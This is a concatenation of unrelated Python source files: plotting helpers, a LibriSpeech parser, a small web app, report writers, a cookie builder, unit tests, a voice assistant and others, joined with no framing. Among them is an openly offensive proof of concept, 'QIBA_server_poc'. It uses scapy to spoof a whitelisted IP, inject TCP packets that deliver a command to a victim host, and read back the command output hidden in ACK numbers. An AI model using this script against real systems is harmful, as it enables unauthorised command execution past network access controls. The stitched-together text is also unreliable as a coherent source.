logging.info("Script execution failed => do forceful cleanup.") logging.debug("- Clean up storage") storage_cleanup(range_id, cyris_path, range_path) logging.debug("- Clean up KVM files") kvm_cleanup(range_id) logging.debug("- Clean up network settings") network_cleanup(range_id) if __name__ == '__main__': main(sys.argv[1:])
import os ROOT_DIR = os.path.dirname(os.path.abspath(__file__)) # This is your Project Root DATA_DIR = os.path.join(ROOT_DIR, 'data')
import numpy import plotly.figure_factory as figure_factory import plotly.graph_objs as graph_objs import plotly.offline as offline # Configure plotly to run in offline mode offline.init_notebook_mode(connected=False) def make_bar_chart(columns, title='', x_axis=''): """Takes an array of dictionaries that have the keys 'column' and 'score'. The value for the 'column' key is a string representing the name of the column. The value for the 'score' key is an integer. """ short_names = (column['column'][:40] for column in columns) truncated_names = [ '{}…'.format(name) if len(name) > 40 else name for name in short_names ] scores = [column['score'] for column in columns] data = [graph_objs.Bar(x=scores, y=truncated_names, orientation='h')] layout = graph_objs.Layout( margin=graph_objs.layout.Margin(), title=title, yaxis=dict( tickfont=dict(size=9, color='rgb(107, 107, 107)'), tickangle=30, automargin=True), xaxis=dict(title=x_axis)) return graph_objs.Figure(data=data, layout=layout) def make_choropleth(fips=[], values=[], title='', legend_title=None, color_scale=None): assert len(fips) == len(values) default_color_scale = [ '#f7fbff', '#ebf3fb', '#deebf7', '#d2e3f3', '#c6dbef', '#b3d2e9', '#9ecae1', '#85bcdb', '#6baed6', '#57a0ce', '#4292c6', '#3082be', '#2171b5', '#1361a9', '#08519c', '#0b4083', '#08306b' ] default_color_scale.reverse() color_scale = color_scale or default_color_scale binning_endpoints = list( numpy.linspace(min(values), max(values), len(color_scale) - 1)) return figure_factory.create_choropleth( fips=fips, values=values, scope=['usa'], colorscale=color_scale, binning_endpoints=binning_endpoints, county_outline={ 'color': 'rgb(15, 15, 55)', 'width': 0.5 }, show_hover=True, centroid_marker=dict(opacity=0), asp=2.9, title=title, showlegend=(legend_title is not None), **(dict(legend_title=legend_title) if legend_title else {})) def make_scatterplot(xs=[], ys=[], text=[], title='', x_axis='', y_axis=''): assert len(xs) == len(ys) == len(text) trace = graph_objs.Scatter(x=xs, y=ys, text=text, mode='markers') layout = graph_objs.Layout( title=title, hovermode='closest', xaxis=dict(title=x_axis), yaxis=dict(title=y_axis), showlegend=False) return graph_objs.Figure(data=[trace], layout=layout)
#!/usr/bin/env python3 """Parse a directory contains Librispeech dataset. Recursively search for "*.trans.txt" file in the given directory and print out `<ID>\\t<AUDIO_PATH>\\t<TRANSCRIPTION>` example: python parse_librispeech.py LibriSpeech/test-clean 1089-134691-0000\t/LibriSpeech/test-clean/1089/134691/1089-134691-0000.flac\tHE COULD WAIT NO LONGER ... Dataset can be obtained from https://www.openslr.org/12 """ import argparse from pathlib import Path def _parse_args(): parser = argparse.ArgumentParser( description=__doc__, formatter_class=argparse.RawTextHelpFormatter, ) parser.add_argument( 'input_dir', type=Path, help='Directory where `*.trans.txt` files are searched.' ) return parser.parse_args() def _parse_transcript(path): with open(path) as trans_fileobj: for line in trans_fileobj: line = line.strip() if line: yield line.split(' ', maxsplit=1) def _parse_directory(root_dir: Path): for trans_file in root_dir.glob('**/*.trans.txt'): trans_dir = trans_file.parent for id_, transcription in _parse_transcript(trans_file): audio_path = trans_dir / f'{id_}.flac' yield id_, audio_path, transcription def _main(): args = _parse_args() for id_, path, transcription in _parse_directory(args.input_dir): print(f'{id_}\t{path}\t{transcription}') if __name__ == '__main__': _main()
#!/usr/bin/env python # DiabloHorn - QIBA_server_poc # Bypassing IP whitelisting using quantum inject import sys import time import socket import collections from scapy.all import * """ iptables -A OUTPUT -p tcp --tcp-flags RST RST -s <ip> -j DROP """ STATE_TEMP = [] CMD_DATA = collections.OrderedDict() def pkt_inspect(pktdata): #print repr(pktdata) if pktdata.haslayer(TCP): tcpdata = pktdata.getlayer(TCP) #check if syn and ack flags are set if ((tcpdata.flags >> 1) & 1) and ((tcpdata.flags >> 4) & 1): if len(STATE_TEMP) == 2: spkt = IP(src=sys.argv[1],dst=sys.argv[2]) / TCP(dport=STATE_TEMP[0].dport,sport=int(sys.argv[3]),flags='PA',seq=STATE_TEMP[1].ack-1,ack=STATE_TEMP[0].ack-1) / (sys.argv[4] + ':' + 'a'*(100-(len(sys.argv[4])+1))) print 'Injecting::::::: %s' % repr(spkt) #print repr(spkt) send(spkt) if len(STATE_TEMP) == 1: if STATE_TEMP[0].ack != tcpdata.ack: STATE_TEMP.append(tcpdata) else: STATE_TEMP.append(tcpdata) def stopcheck(pktdata): if pktdata.haslayer(TCP): tcpdata = pktdata.getlayer(TCP) if tcpdata.ack == 1 and tcpdata.dport == 31337: return True else: return False def data_recv(pktdata): global CMD_DATA if pktdata.haslayer(TCP): #print pktdata.getlayer(TCP).ack-1 try: encdata = '{:02x}'.format(pktdata.getlayer(TCP).ack-1).decode('hex') if ((ord(encdata[0]) + ord(encdata[1]) + ord(encdata[2])) % 0xff) == ord(encdata[3]): print "cmdoutput::::::: %s" % encdata[0:3] CMD_DATA[pktdata.getlayer(TCP).seq] = encdata[0:3] except TypeError: pass except IndexError: pass def stopdatarecv(pktdata): if pktdata.haslayer(TCP): try: encdata = '{:02x}'.format(pktdata.getlayer(TCP).ack-1).decode('hex') #print encdata if encdata == "STOP": return True else: return False except TypeError: pass except IndexError: pass if __name__ == "__main__": if len(sys.argv) != 5: print "{} <whitelisted ip> <victim ip> <whitelisted port> <cmd>".format(sys.argv[0]) sys.exit() sniff(iface="eth0",store=0,prn=pkt_inspect,filter="ip and host {}".format(sys.argv[1]), stop_filter=stopcheck) sniff(iface="eth0",store=0,prn=data_recv,filter="ip and host {}".format(sys.argv[1]), stop_filter=stopdatarecv) finalout = '' for k,v in CMD_DATA.iteritems(): finalout += v print finalout
import time from uuid import uuid4 from emmett import App, request, response from emmett.tools import service app = App(__name__) app.config.handle_static = False @app.route(methods=["get"], output="str") async def html(): """Return HTML content and a custom header.""" response.headers["x-time"] = f"{time.time()}" response.content_type = "text/html" return "<b>HTML OK</b>" @app.route(methods=["post"], output="str") async def upload(): """Load multipart data and store it as a file.""" data = (await request.files).file if not data: response.status = 400 return "" target = f"/tmp/{uuid4().hex}" await data.save(target) return target @app.route("/api/users/<int:user>/records/<int:record>", methods=["put"]) @service.json async def api(user, record): """Check headers for authorization, load JSON/query data and return as JSON.""" if not request.headers.get("authorization"): response.status = 401 return {} return { "params": {"user": user, "record": record}, "query": request.query_params, "data": await request.body_params }
import csv from datetime import datetime from lurge_types.group_report import GroupReport from directory_config import REPORT_DIR import logging import logging.config from lurge_types.user import UserReport import typing as T def createTsvReport(group_reports: T.Dict[str, T.List[GroupReport]], date: str, report_dir: str, logger: logging.Logger) -> None: """ Reads the contents of tables in tmp_db and writes them to a .tsv formatted file. :param group_reports: volume -> list of GroupReports for all the data we'll put in the report :param date: Date string of the data to be used (ie, "2019-09-20") """ # sets filename to 'report-YYYYMMDD.tsv' name = "report-{}.tsv".format(date.replace("-", "")) with open(report_dir+"report-output-files/"+name, "w", newline="") as reportfile: # start a writer that will format the file as tab-separated report_writer = csv.writer(reportfile, delimiter="\t", quoting=csv.QUOTE_NONE) # write column headers report_writer.writerow(["Lustre Volume", "PI", "Unix Group", "Used (bytes)", "Quota (bytes)", "Last Modified (days)", "Archived Directories", "Is Humgen?"]) logger.info("Adding data to tsv report") for volume, reports in group_reports.items(): logger.debug("Inserting data for {}...".format(volume)) for report in reports: data = ["-" if x == None else x for x in report.row] report_writer.writerow(data) logger.info("{} created.".format(name)) def create_tsv_user_report(user_reports: T.Dict[int, T.DefaultDict[str, UserReport]], usernames: T.Dict[int, str], user_groups: T.Dict[str, T.List[T.Tuple[str, str]]], logger: logging.Logger) -> None: logger.info("Writing user report info to TSV file") with open(f"{REPORT_DIR}user-reports/{datetime.today().strftime('%Y-%m-%d')}.tsv", "w", newline="") as rf: writer = csv.writer(rf, delimiter="\t", quoting=csv.QUOTE_NONE) writer.writerow(["username", "data", *user_reports.keys()]) for uid, uname in usernames.items(): for grp_name, gid in user_groups[str(uid)]: writer.writerow([uname, "size", grp_name, *[ round(user_reports[vol][str(uid)].size[gid]/2 ** 20, 2) if str(uid) in user_reports[vol] and gid in user_reports[vol][str(uid)].size else 0 for vol in user_reports ]]) writer.writerow([uname, "mtime", grp_name, *[ user_reports[vol][str(uid)]._mtime[gid].strftime( '%Y-%m-%d') if str(uid) in user_reports[vol] and gid in user_reports[vol][str(uid)]._mtime else "-" for vol in user_reports ]]) logger.info("Done writing user report info to TSV file")
import arrow from optional import Optional from eynnyd.exceptions import InvalidCookieBuildException from eynnyd.internal.utils.cookies import rfc from eynnyd.internal.utils.cookies.response_cookie import ResponseCookie class ResponseCookieBuilder: """ Response cookies are generally just key-value pairs but can be more complicated. Using this builder allows for simple creation of generic or complex cookies with validation. """ def __init__(self, name, value): """ Constructs an initial ResponseCookieBuilder with common defaults. :param name: a valid cookie name (via rfc spec) :param value: a valid cookie value (via rfc spec) """ self._name = name self._value = value self._expires = Optional.empty() self._max_age = Optional.empty() self._domain = Optional.empty() self._path = Optional.empty() self._secure = True self._http_only = True def set_expires(self, expires): """ Sets the cookie to include an expiry date. :param expires: a date, parsable by python Arrow :return: This builder to allow for fluent design. """ try: encoded = arrow.get(expires) except arrow.parser.ParserError as e: raise InvalidCookieBuildException("Invalid datetime {d}, unable to parse.".format(d=expires), e) self._expires = Optional.of(encoded) return self def set_expires_in_days(self, days_till_expiry): """ Sets the cookie to include an expiry date in days from now. :param days_till_expiry: number of days from now to the expiry time. :return: This builder to allow for fluent design. """ try: encoded = int(days_till_expiry) except ValueError as e: raise InvalidCookieBuildException("Invalid days {d}".format(d=days_till_expiry), e) self._expires = Optional.of(arrow.utcnow().shift(days=encoded)) return self def set_max_age(self, max_age): """ Sets the max age of the cookie. :param max_age: an rfc compliant max age :return: This builder to allow for fluent design. """ if not bool(rfc.VALID_RFC_MAX_AGE.fullmatch(str(max_age))): raise InvalidCookieBuildException("Max Age {m} does not comply with RFC Cookies Specs.".format(m=max_age)) self._max_age = Optional.of(str(max_age)) return self def set_domain(self, domain): """ Sets the limiting domain for the cookie. :param domain: an rfc compliant domain :return: This builder to allow for fluent design. """ if not bool(rfc.VALID_RFC_DOMAIN.fullmatch(domain)): raise InvalidCookieBuildException("Domain {d} does not comply with RFC Cookie Specs.".format(d=domain)) self._domain = Optional.of(domain) return self def set_path(self, path): """ Sets the limiting path for the cookie. :param path: an rfc compliant path :return: This builder to allow for fluent design. """ if not bool(rfc.VALID_RFC_PATH.fullmatch(path)): raise InvalidCookieBuildException("Path {p} does not comply with RFC Cookie Specs.".format(p=path)) self._path = Optional.of(path) return self def set_secure(self, secure): """ Sets whether the cookie is secure or not. :param secure: a boolean to indicate if we are setting secure or insecure :return: This builder to allow for fluent design. """ self._secure = bool(secure) return self def set_http_only(self, http_only): """ Sets whether the cookie is http only or not. :param http_only: a boolean to indicate if we are setting http only or not :return: This builder to allow for fluent design. """ self._http_only = bool(http_only) return self def build(self): """ Validates the name and value and builds the ResponseCookie object. :return: a valid ResponseCookie object. """ if not bool(rfc.VALID_RFC_COOKIE_NAME.fullmatch(self._name)): raise InvalidCookieBuildException("Cookie Name {n} does not comply with RFC Cookie Specs.".format(n=self._name)) if not bool(rfc.VALID_RFC_COOKIE_VALUE.fullmatch((self._value))): raise InvalidCookieBuildException( "Cookie Value {v} does not comply with RFC Cookie Specs.".format(v=self._value)) return ResponseCookie( self._name, self._value, self._expires, self._max_age, self._domain, self._path, self._secure, self._http_only)
# pylint: disable=missing-function-docstring,missing-module-docstring, protected-access from unittest.mock import AsyncMock, patch import pytest from custom_components.hacs.base import HacsBase, HacsRepositories from custom_components.hacs.enums import HacsDisabledReason from custom_components.hacs.exceptions import HacsException from custom_components.hacs.repositories.base import HacsRepository @pytest.mark.asyncio async def test_load_hacs_repository_exist(hacs: HacsBase, repository: HacsRepository): await hacs.tasks.async_load() task = hacs.tasks.get("load_hacs_repository") assert task assert not repository.data.installed with patch( "custom_components.hacs.base.HacsRepositories.get_by_full_name", return_value=repository ): await task.execute_task() assert repository.data.installed @pytest.mark.asyncio async def test_load_hacs_repository_register_failed( hacs: HacsBase, caplog: pytest.LogCaptureFixture, ): await hacs.tasks.async_load() task = hacs.tasks.get("load_hacs_repository") assert task assert not hacs.system.disabled with patch("custom_components.hacs.base.HacsBase.async_register_repository", AsyncMock()): await task.execute_task() assert hacs.system.disabled assert hacs.system.disabled_reason == HacsDisabledReason.LOAD_HACS assert "[Unknown error] - Could not load HACS!" in caplog.text @pytest.mark.asyncio async def test_load_hacs_repository_register_failed_rate_limit( hacs: HacsBase, caplog: pytest.LogCaptureFixture, ): await hacs.tasks.async_load() task = hacs.tasks.get("load_hacs_repository") assert task assert not hacs.system.disabled with patch( "custom_components.hacs.base.HacsBase.async_register_repository", side_effect=HacsException("ratelimit 403"), ): await task.execute_task() assert hacs.system.disabled assert hacs.system.disabled_reason == HacsDisabledReason.LOAD_HACS assert "GitHub API is ratelimited, or the token is wrong." in caplog.text
#!/usr/bin/env python3 from unittest import TestCase, main from graph2tensor.model.data import EgoTensorGenerator, build_output_signature from graph2tensor.model.data import build_sampling_table from graph2tensor.model.data import SkipGramGenerator4DeepWalk from graph2tensor.model.data import SkipGramGenerator4Node2Vec from graph2tensor.model.data import SkipGramGenerator4MetaPath2Vec from graph2tensor.client import NumpyGraph import numpy as np import tensorflow as tf from test_utils import graph_setup g = NumpyGraph() class TestDataset(TestCase): def test_1_setup(self): graph_setup(g) def test_egotensor_generator(self): ids = np.arange(169343) labels = np.random.randint(2, size=ids.shape[0], dtype=np.int32) output_signature = build_output_signature(g.schema, ["(paper) -[cites]- (paper) -[cites]- (paper)"], False) with EgoTensorGenerator( graph=g, meta_paths=["(paper) -[cites]- (paper) -[cites]- (paper)"], sampler_process_num=1, converter_process_num=1, expand_factors=2, strategies="random", include_edge=False) as data_gen: ds = tf.data.Dataset.from_generator( data_gen, args=(ids, 1024, False, labels), output_signature=output_signature ).repeat(2) for _ in ds: pass def test_skipgram_generator_deepwalk(self): ids = np.arange(169343) sampling_table = build_sampling_table(g, 'cites') with SkipGramGenerator4DeepWalk( graph=g, edge_type='cites', vocabulary_size=169343, negative_samples=4, sampling_table=sampling_table) as data_gen: ds = tf.data.Dataset.from_generator( data_gen, args=(ids, 1024), output_signature=((tf.TensorSpec(shape=(None,), dtype=tf.int64), tf.TensorSpec(shape=(None, 4+1), dtype=tf.int64)), tf.TensorSpec(shape=(None, 4+1), dtype=tf.int32)) ).repeat(2) for _ in ds: pass def test_skipgram_generator_node2vec(self): ids = np.arange(169343) sampling_table = build_sampling_table(g, 'cites') with SkipGramGenerator4Node2Vec( graph=g, edge_type='cites', vocabulary_size=169343, negative_samples=4, sampling_table=sampling_table) as data_gen: ds = tf.data.Dataset.from_generator( data_gen, args=(ids, 1024), output_signature=((tf.TensorSpec(shape=(None,), dtype=tf.int64), tf.TensorSpec(shape=(None, 4+1), dtype=tf.int64)), tf.TensorSpec(shape=(None, 4+1), dtype=tf.int32)) ).repeat(2) for _ in ds: pass def test_skipgram_generator_metapath2vec(self): ids = np.arange(169343) sampling_table = build_sampling_table(g, 'cites') with SkipGramGenerator4MetaPath2Vec( graph=g, meta_path="(paper) -[cites]- (paper) -[cites]- (paper)", walk_length=6, vocabulary_size=169343, negative_samples=4, sampling_table=sampling_table) as data_gen: ds = tf.data.Dataset.from_generator( data_gen, args=(ids, 1024), output_signature=((tf.TensorSpec(shape=(None,), dtype=tf.int64), tf.TensorSpec(shape=(None, 4+1), dtype=tf.int64)), tf.TensorSpec(shape=(None, 4+1), dtype=tf.int32)) ).repeat(2) for _ in ds: pass if __name__ == "__main__": main()
import speech_recognition as sr import webbrowser import wikipedia import requests import pyttsx3 import urllib import random import json import lxml import math import time import bs4 import os from nltk.corpus import wordnet as wn from bs4 import BeautifulSoup as soup from time import gmtime, strftime from googlesearch import search from pygame import mixer from yr.libyr import Yr from lxml import etree os.system('cls' if os.name == 'nt' else 'clear') engine = pyttsx3.init() engine.setProperty('rate', 140) weather = Yr(location_name='South_Africa/KwaZulu-Natal/Durban/') #Fill in your own location. More help in readme.md r = sr.Recognizer() r.dynamic_energy_threshold = False engine.say("I am cashew, a TTS Virtual assistant, clap before talking so I can hear you, say cashew to turn me on") engine.runAndWait() microphone_index = 2 #Change this to whatever audio channel your microphone is on. def onnoise(): mixer.init() mixer.music.load(r"Robot_blip-Marianne_Gagnon-120342607.ogg") #Change this location to where ever the sound files are located mixer.music.play() def offnoise(): mixer.init() mixer.music.load(r"Robot_blip_2-Marianne_Gagnon-299056732.ogg") #Change this to where ever the sound files are located mixer.music.play() try: while True: wake = "" w = sr.Recognizer() w.dynamic_energy_threshold = True speech5 = sr.Microphone(device_index=microphone_index) with speech5 as source: oaudio = w.listen(source) w.adjust_for_ambient_noise(source) try: wake = w.recognize_google(oaudio, language = 'en-US') except sr.UnknownValueError: pass except sr.WaitTimeoutError: pass if "cashew" in wake: onnoise() while True: try: r = sr.Recognizer() r.dynamic_energy_threshold = False speech = sr.Microphone(device_index=microphone_index) with speech as source: audio = r.listen(source, timeout=10.0) r.adjust_for_ambient_noise(source) recog = r.recognize_google(audio, language = 'en-US') if "search" in recog: engine.say("Sure. What do you want me to search?") engine.runAndWait() speech2 = sr.Microphone(device_index=microphone_index) with speech2 as source: qaudio = r.listen(source, timeout=10.0) r.adjust_for_ambient_noise(source) query = r.recognize_google(qaudio, language = 'en-US') engine.say(wikipedia.summary(query)) engine.runAndWait() break if "Bing" in recog: engine.say("Sure. What do you want me to search on bing?") engine.runAndWait() speech2 = sr.Microphone(device_index=microphone_index) with speech2 as source: qaudio = r.listen(source, timeout=10.0) r.adjust_for_ambient_noise(source) query = r.recognize_google(qaudio, language = 'en-US') search = query.replace(" ", "+") webbrowser.open("https://www.bing.com/search?q=" + search) break elif "play" in recog: engine.say("Sure. What do you want me to play?") engine.runAndWait() speech2 = sr.Microphone(device_index=microphone_index) with speech2 as source: qaudio = r.listen(source, timeout=10.0) r.adjust_for_ambient_noise(source) query = r.recognize_google(qaudio, language = 'en-US') engine.say("Sure. Searching for" + query) engine.runAndWait() for j in search(query, tld="co.in", num=True==True, stop=0, pause=2): if "/watch?v=" in j: url = j youtube = etree.HTML(urllib.request.urlopen(url).read()) video_title = youtube.xpath("//span[@id='eow-title']/@title") title = ''.join(video_title) if "reaction" in query: engine.say("Now playing" + title) engine.runAndWait() webbrowser.open(url) break else: if "reaction" not in title: if "REACTION" not in title: if "Reaction" not in title: engine.say("Now playing" + title) engine.runAndWait() webbrowser.open(url) break break elif "time" in recog: tim = strftime("%H:%M:%S") engine.say("The current time is" + tim) engine.runAndWait() break elif "spell" in recog: engine.say("Sure. What do you want me to spell?") engine.runAndWait() speech2 = sr.Microphone(device_index=microphone_index) with speech2 as source: qaudio = r.listen(source, timeout=10.0) r.adjust_for_ambient_noise(source) query = r.recognize_google(qaudio, language = 'en-US') speeling = list(query) spelling = str(speeling) engine.say(query + ", is spelled:" + spelling) engine.runAndWait() break elif "define" in recog: try: engine.say("Sure. What word's definition do you want to know?") engine.runAndWait() speech2 = sr.Microphone(device_index=microphone_index) with speech2 as source: qaudio = r.listen(source, timeout=10.0) r.adjust_for_ambient_noise(source) query = r.recognize_google(qaudio, language = 'en-US') word = wn.synsets(query) defi = word[0].definition() engine.say("The definition of " + query + " is " + defi) engine.runAndWait() break except IndexError: engine.say("I could not find a definition for " + defi) engine.runAndWait() break elif "synonym" in recog: try: engine.say("Sure. What word do you want a synonym for?") engine.runAndWait() speech2 = sr.Microphone(device_index=microphone_index) with speech2 as source: qaudio = r.listen(source, timeout=10.0) r.adjust_for_ambient_noise(source) query = r.recognize_google(qaudio, language = 'en-US') word = query synonyms = [] antonyms = [] for syn in wn.synsets(word): for l in syn.lemmas(): synonyms.append(l.name()) if l.antonyms(): antonyms.append(l.antonyms()[0].name()) if synonyms != []: engine.say("Some synonyms for " + word + " are " + str(synonyms)) engine.runAndWait() break else: engine.say("I could not find synonyms for " + word) engine.runAndWait() break except: pass elif "antonym" in recog: try: engine.say("Sure. What word do you want an antonym for?") engine.runAndWait() speech2 = sr.Microphone(device_index=microphone_index) with speech2 as source: qaudio = r.listen(source, timeout=10.0) r.adjust_for_ambient_noise(source) query = r.recognize_google(qaudio, language = 'en-US') word = query synonyms = [] antonyms = [] for syn in wn.synsets(word): for l in syn.lemmas(): synonyms.append(l.name()) if l.antonyms(): antonyms.append(l.antonyms()[0].name()) if antonyms != []: engine.say("Some antonyms for " + word + " are " + str(antonyms)) engine.runAndWait() break else: engine.say("I could not find antonyms for " + word) engine.runAndWait() break except: pass elif "where" in recog: engine.say("Sure. What location do you want to know?") engine.runAndWait() speech2 = sr.Microphone(device_index=microphone_index) with speech2 as source: qaudio = r.listen(source, timeout=10.0) r.adjust_for_ambient_noise(source) query = r.recognize_google(qaudio, language = 'en-US') search = query.replace(" ", "+") webbrowser.open("https://www.google.co.za/maps/search/" + search) break elif "weather" in recog: now = weather.now(as_json=False) overtemp = now['temperature'] tempunit = overtemp['@unit'] tempvalue = overtemp['@value'] oversky = now['symbol'] skycon = oversky['@name'] overrain = now['precipitation'] rainvalue = overrain['@value'] overwind = now['windDirection'] overwind2 = now['windSpeed'] winddirection = overwind['@name'] windspeed = overwind2['@mps'] windspeedname = overwind2['@name'] overpressure = now['pressure'] unit = overpressure['@unit'] pressure = overpressure['@value'] engine.say("The weather for the next four hours is as follows:") engine.runAndWait() engine.say("The temperature will be " + tempvalue + " degrees " + tempunit + " average.") engine.runAndWait() engine.say("With a " + skycon + ".") engine.runAndWait() engine.say("It will rain " + rainvalue + " millilitres in the next 4 hours.") engine.runAndWait() engine.say("The wind is " + windspeedname + ", blowing at " + windspeed + " meters per second going " + winddirection) engine.runAndWait() engine.say("The pressure is " + pressure + " heteropascles.") engine.runAndWait() break elif "joke" in recog: engine.say("Sure. What do you want the joke to be about? Say random for a random catagory.") engine.runAndWait() speech2 = sr.Microphone(device_index=microphone_index) with speech2 as source: qaudio = r.listen(source, timeout=10.0) r.adjust_for_ambient_noise(source) query = r.recognize_google(qaudio, language = 'en-US') try: if "random" in query: send_url = 'https://sv443.net/jokeapi/v2/joke/Any?blacklistFlags=nsfw,religious,political,racist,sexist' r = requests.get(send_url) j = json.loads(r.text) error = j['error'] if j['type'] == "twopart": if error == "true": engine.say(j['message']) engine.runAndWait() break else: joke1 = j['setup'] joke2 = j['delivery'] engine.say(joke1) engine.runAndWait() engine.say(joke2) engine.runAndWait() break else: if error == "true": engine.say(j['message']) engine.runAndWait() break else: joke = j['joke'] engine.say(joke) engine.runAndWait() break else: send_url = 'https://sv443.net/jokeapi/v2/joke/Any?blacklistFlags=nsfw,religious,political,racist,sexist&type=single&contains=' send_url2 = query r = requests.get(send_url + send_url2) j = json.loads(r.text) error = j['error'] if j['type'] == "twopart": if error == "true": engine.say(j['message']) engine.runAndWait() break else: joke1 = j['setup'] joke2 = j['delivery'] engine.say(joke1) engine.runAndWait() engine.say(joke2) engine.runAndWait() break else: if error == "true": engine.say(j['message']) engine.runAndWait() break else: joke = j['joke'] engine.say(joke) engine.runAndWait() break except KeyError: engine.say("No joke was found with that key word.") engine.runAndWait() break elif "news" in recog: news_url="https://news.google.com/news/rss" Client=urllib.request.urlopen(news_url) xml_page=Client.read() Client.close() soup_page=soup(xml_page,"xml") news_list=soup_page.findAll("item") for news in news_list: engine.say("At " + news.pubDate.text + " The following story happened.") engine.runAndWait() engine.say(news.title.text) engine.runAndWait() engine.say("The source of this news is " + news.source.text) engine.runAndWait() break engine.say("Would you like me to open the story up in your browser?") engine.runAndWait() speech2 = sr.Microphone(device_index=microphone_index) with speech2 as source: qaudio = r.listen(source, timeout=10.0) r.adjust_for_ambient_noise(source) query = r.recognize_google(qaudio, language = 'en-US') if "yes" in query: link = news.link.text webbrowser.open(link) break else: continue break elif "date" in recog: tim = strftime("%Y-%m-%d") engine.say("The current date is" + tim) engine.runAndWait() break elif "off" in recog: offnoise() time.sleep(1) try: os.remove(r"D:\Users\cayde\Documents\Code\Python\.google-cookie") exit() except FileNotFoundError: exit() elif "credits" in recog: engine.say("This was made by Cayden d W on GitHub! Would you like me to open his page?") engine.runAndWait() speech2 = sr.Microphone(device_index=microphone_index) with speech2 as source: qaudio = r.listen(source, timeout=10.0) r.adjust_for_ambient_noise(source) query = r.recognize_google(qaudio, language = 'en-US') if "yes" in query: webbrowser.open("https://github.com/CaydendW") else: break break elif "hello" in recog: engine.say("Hello to you too!") engine.runAndWait() break elif "hi" in recog: engine.say("Hello to you too!") engine.runAndWait() break elif "thank you" in recog: engine.say("You're welcome!") engine.runAndWait() break elif "coin" in recog: coin = random.randint(1,2) if coin==1: engine.say("Heads") engine.runAndWait() break else: engine.say("Tails") engine.runAndWait() break elif "dice" in recog: engine.say("You rolled a " + str(random.randint(1,6))) engine.runAndWait() break elif "0 / 0" in recog: engine.say("I just.. I just what do i .. wha i.. ggfuspm i just. wfubhdnuhlihgvfbihgvybzsxcrdrrsv57helpme ..fgw6e7yesd5rfd68tgtwo7yjuokmc,,ioueuyrepq87ty89") engine.runAndWait() exit() elif "cashew" in recog: engine.say("Yes!? I'm listening...") engine.runAndWait() break elif "yes" in recog: engine.say("I'm glad something is going well.") engine.runAndWait() break elif "help" in recog: webbrowser.open("https://github.com/CaydendW/Cashew/blob/master/help.md") break else: engine.say("Sorry but " + recog + "is not one of my commands. Say help to hear a list of commands.") engine.runAndWait() except sr.UnknownValueError: continue except sr.RequestError: continue except sr.WaitTimeoutError: offnoise() time.sleep(1) try: os.remove(r"D:\Users\cayde\Documents\Code\Python\.google-cookie") break except FileNotFoundError: break except KeyboardInterrupt: offnoise() time.sleep(1) try: os.remove(r".google-cookie") exit() except FileNotFoundError: exit() except KeyboardInterrupt: offnoise() time.sleep(1) try: os.remove(r".google-cookie") exit() except FileNotFoundError: exit() exit() except: engine.say("An unknown exception occured.")
from app import runWebsite runWebsite()
# -*- coding: utf-8 -*- # 将你的 QQ 头像(或者微博头像)右上角加上红色的数字,类似于微信未读信息数量那种提示效果。 from PIL import Image, ImageFont, ImageDraw def add_num(img): im = Image.open(img) w, h = im.size font = ImageFont.truetype('/usr/share/fonts/truetype/ubuntu-font-family/UbuntuMono-R.ttf', 30) fillcolor = "#ff0000" draw = ImageDraw.Draw(im) draw.text((w - 20, 0), '1', font=font, fill=fillcolor) im.save('r.jpg', 'jpeg') if __name__ == '__main__': add_num('1.jpg')
""" MIT License Copyright (c) 2021 mooncell07 Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ from __future__ import annotations from datetime import date, datetime from typing import Optional, Mapping, Any from .partialmanifest import PartialManifest __all__ = ("Manifest",) class Manifest(PartialManifest): """ A class representing a `Manifest`. Attributes: rover_id (Optional[int]): ID of the rover. rover_name (str): Name of the Rover. status (Optional[str]): The Rover's mission status. max_sol (Optional[int]): The most recent Martian sol from which photos exist. total_photos (Optiona[int]): Number of photos taken by that Rover. cameras (Mapping[str, str]): Cameras for which there are photos by that Rover on that sol. """ # noqa: E501 __slots__ = ( "max_sol", "total_photos", "cameras", ) def __init__(self, data: Mapping[Any, Any]) -> None: super().__init__(data) self.max_sol: Optional[int] = data.get("max_sol") self.total_photos: Optional[int] = data.get("total_photos") self.cameras: Mapping[str, str] = data.get("cameras", {}) def __eq__(self, value: Any) -> bool: """ Checks if two objects are same using `rover_id`. Returns: Result of `obj == obj`. """ return isinstance(value, self.__class__) and value.rover_id == self.rover_id @property def max_date(self) -> date: """ The most recent Earth date from which photos exist. Returns: A [datetime.date][] object. """ # noqa: E501 return datetime.date( datetime.strptime(self._rover_info["max_date"], "%Y-%m-%d") )
from dependency_injector import containers from fdap.config.config import Config from fdap.utils.customlogger import CustomLogger from fdap.utils.loggeradapter import LoggerAdapter from typing import Callable class Application: _container: containers.DeclarativeContainer _logger: LoggerAdapter def __init__(self, container: containers.DeclarativeContainer, callback: Callable = None): self._logger = CustomLogger.logger('root', 'application') self._container = container self._container.config.from_dict(Config.all()) self._container.init_resources() if callback is not None: self.bootstrap(callback) def get(self, name: str) -> any: return self._container.providers.get(name)() def bootstrap(self, callback: Callable): try: callback(self) except Exception as e: self._logger.error('Failed Bootstrapping...') self._logger.error(e)
